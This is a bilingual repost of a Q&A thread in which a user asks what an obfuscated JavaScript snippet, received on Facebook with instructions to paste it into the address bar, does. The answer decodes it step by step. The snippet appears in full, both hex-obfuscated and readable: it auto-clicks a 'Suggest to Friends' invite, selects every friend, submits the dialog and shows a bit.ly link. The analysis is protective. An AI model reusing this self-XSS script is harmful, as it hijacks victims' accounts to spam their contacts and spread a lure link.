地址栏中的Javascript-这是恶意的吗? [英] Javascript in the address bar - is this malicious?

问题描述

我在Facebook上收到一条消息，告诉我将其复制并粘贴到我的地址栏中.我以为我会在这里张贴它，看看每个人对此有何看法.它有什么作用?它是如何工作的?

I got a message on Facebook telling me to copy and paste this into my address bar. I thought I'd post it here and see what everyone thinks about it. What does it do? How does it work?

这是源代码:

// (DO NOT DO THIS!)
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]);
var c=document[a[6]](a[5]);
c[a[8]](a[7],true,true);
void (ss[a[9]](c));
void (setTimeout(function (){fs[a[10]]();} ,4000));
void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000));
void (setTimeout(function (){
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E";
} ,5400));

推荐答案

以下是格式化的源:

var a = ["innerHTML", 
         "app4949752878_app4949752878_dd", 
         "getElementById", 
         "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>",
         "suggest", 
         "MouseEvents", 
         "createEvent", 
         "click", 
         "initEvent", 
         "dispatchEvent", 
         "select_all", 
         "sgm_invite_form", 
         "/ajax/social_graph/invite_dialog.php", 
         "submitDialog"];

void (document[a[2]](a[1])[a[0]] = a[3]);
var ss = document[a[2]](a[4]);
var c = document[a[6]](a[5]);
c[a[8]](a[7], true, true);
void ss[a[9]](c);
void setTimeout(function () {fs[a[10]]();}, 4000);
void setTimeout(function () {SocialGraphManager[a[13]](a[11], a[12]);}, 5000);
void setTimeout(function () {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";}, 5400);

a 数组保存该代码使用的所有字符串.
这是将字符串放回原处的情况:

The a array holds all strings used by the code.
Here it is with the strings put back in place:

void (document.getElementById('app4949752878_app4949752878_dd').innerHTML =  "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");
var ss = document.getElementById("suggest");
var c = document.createEvent("MouseEvents");
c.initEvent("click", true, true);
void ss.dispatchEvent(c);
void setTimeout(function () {fs.select_all();}, 4000);
void setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
void setTimeout(function () {
    document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);

最后，这里的名称和结构都不错:

Finally, here it is with decent names and structure:

var messageElement = document.getElementById('app4949752878_app4949752878_dd');

messageElement.innerHTML = 
    "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";

var suggestLink = document.getElementById("suggest");
var mouseEvent = document.createEvent("MouseEvents");
mouseEvent.initEvent("click", true, true);
suggestLink.dispatchEvent(mouseEvent);


setTimeout(function () { fs.select_all(); }, 4000);
setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
setTimeout(function () {
    messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);

这篇关于地址栏中的Javascript-这是恶意的吗?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！